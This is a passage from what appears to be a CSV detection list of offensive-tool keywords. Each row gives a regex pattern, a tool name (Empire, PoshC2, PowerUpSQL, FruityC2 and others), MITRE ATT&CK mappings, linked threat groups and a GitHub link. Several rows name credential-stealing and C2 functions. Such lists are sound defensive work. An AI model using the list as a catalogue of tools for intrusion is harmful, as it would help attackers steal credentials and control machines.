T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46220"
"*gets4uticket.py*",".{0,1000}gets4uticket\.py.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550.003 - T1557.002 - T1552.004 - T1212 - T1550","TA0009 - TA0008","N/A","N/A","Lateral Movement","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","N/A","8","737","82","2025-01-03T14:25:52Z","2021-07-27T19:06:09Z","46221"
"*Get-SccmCacheFolder*",".{0,1000}Get\-SccmCacheFolder.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","46222"
"*Get-ScheduledTaskComHandler.json*",".{0,1000}Get\-ScheduledTaskComHandler\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","46223"
"*get-screenshot*",".{0,1000}get\-screenshot.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","46224"
"*Get-Screenshot.ps1*",".{0,1000}Get\-Screenshot\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46225"
"*Get-Screenshot.ps1*",".{0,1000}Get\-Screenshot\.ps1.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","46226"
"*get-screenshotallwindows*",".{0,1000}get\-screenshotallwindows.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","46227"
"*Get-SecurityPackages.ps1*",".{0,1000}Get\-SecurityPackages\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-Vnc.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46228"
"*Get-ServiceUnquoted*",".{0,1000}Get\-ServiceUnquoted.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46229"
"*Get-ShadowCopies*",".{0,1000}Get\-ShadowCopies.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","46230"
"*Get-SharePointSiteURLs*",".{0,1000}Get\-SharePointSiteURLs.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Gets a list of SharePoint site URLs visible to the current user","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","46231"
"*Get-SharpChromium*",".{0,1000}Get\-SharpChromium.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46232"
"*Get-SharpChromium.ps1*",".{0,1000}Get\-SharpChromium\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46233"
"*GetShellcode(*",".{0,1000}GetShellcode\(.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","46234"
"*Get-SitelistFields*",".{0,1000}Get\-SitelistFields.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-SiteListPassword.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46235"
"*Get-SiteListPassword*",".{0,1000}Get\-SiteListPassword.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-SiteListPassword.ps1 PowerUp.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46236"
"*Get-SiteListPassword.ps1*",".{0,1000}Get\-SiteListPassword\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46238"
"*Get-SMBSigning -DelayJitter *",".{0,1000}Get\-SMBSigning\s\-DelayJitter\s.{0,1000}","offensive_tool_keyword","CheckSMBSigning","Checks for SMB signing disabled on all hosts in the network","T1018 - T1550","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Leo4j/CheckSMBSigning","1","0","N/A","N/A","6","1","8","1","2023-10-13T11:55:33Z","2023-05-17T11:47:52Z","46239"
"*getsploit*",".{0,1000}getsploit.{0,1000}","offensive_tool_keyword","getsploit","Command line search and download tool for Vulners Database inspired by searchsploit. It allows you to search online for the exploits across all the most popular collections: Exploit-DB. Metasploit. Packetstorm and others. The most powerful feature is immediate exploit source download right in your working path.","T1583 - T1584 - T1586","TA0007","N/A","N/A","Exploitation tool","https://github.com/vulnersCom/getsploit","1","0","N/A","N/A","N/A","10","1762","245","2024-06-09T20:15:41Z","2017-06-04T09:31:44Z","46240"
"*Get-SPN.ps1*",".{0,1000}Get\-SPN\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1114","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46241"
"*Get-SPN-FruityC2.ps1*",".{0,1000}Get\-SPN\-FruityC2\.ps1.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","46242"
"*get-spns All*",".{0,1000}get\-spns\sAll.{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","N/A","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","46243"
"*get-spns ASREP*",".{0,1000}get\-spns\sASREP.{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","N/A","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","46244"
"*get-spns spns*",".{0,1000}get\-spns\sspns.{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","N/A","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","46245"
"*Get-SQLC2Agent*",".{0,1000}Get\-SQLC2Agent.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46246"
"*Get-SQLC2Command *",".{0,1000}Get\-SQLC2Command\s.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46247"
"*Get-SQLC2ComputerNameFromInstance*",".{0,1000}Get\-SQLC2ComputerNameFromInstance.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46248"
"*Get-SQLC2Connection*",".{0,1000}Get\-SQLC2Connection.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46249"
